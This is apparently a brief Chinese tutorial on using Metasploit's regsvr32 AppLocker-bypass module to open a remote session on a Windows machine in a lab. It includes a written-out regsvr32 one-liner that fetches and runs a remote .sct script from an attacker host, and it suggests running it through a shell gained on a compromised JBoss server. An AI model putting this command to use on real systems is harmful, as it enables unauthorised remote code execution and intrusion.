Metasploit对Rundll32的

参考利用文章链接:http://www.freebuf.com/articles/terminal/135391.html

    http://www.4hou.com/technology/5737.html

Rundll32的利用是通过对注册动手脚,建立一个会话链接W7以上都存在,但是现在杀毒软件都监控,实验的时候关闭目标机的

杀毒软件(如:360)

通过虚拟机打物理机,下图可以看见同一网段而且是互相可以通讯的

Metasploit对Rundll32的_第1张图片

启动Metasploit

Metasploit对Rundll32的_第2张图片

加载漏洞利用模块:use exploit/windows/misc/regsvr32_applocker_bypass_server 

Metasploit对Rundll32的_第3张图片


查看需要哪些参数:show options 

Metasploit对Rundll32的_第4张图片

配置参数运行

Metasploit对Rundll32的_第5张图片

得到一个 regsvr32 /s /n /u /i:http://192.168.117.155:8080/S2hYxUgEgmEK9.sct scrobj.dll

Metasploit对Rundll32的_第6张图片

结合jeboss抓的服务器如果是Windows的,在获得的shell 的CMD命令下执行

Metasploit对Rundll32的_第7张图片

在回到kail 发现反弹了一个session ,执行session就开启了一个CMD

Metasploit对Rundll32的_第8张图片


结合一些windows的命令执行参考链接: http://www.sohu.com/a/199732200_99907709 





你可能感兴趣的:(Metasploit对Rundll32的)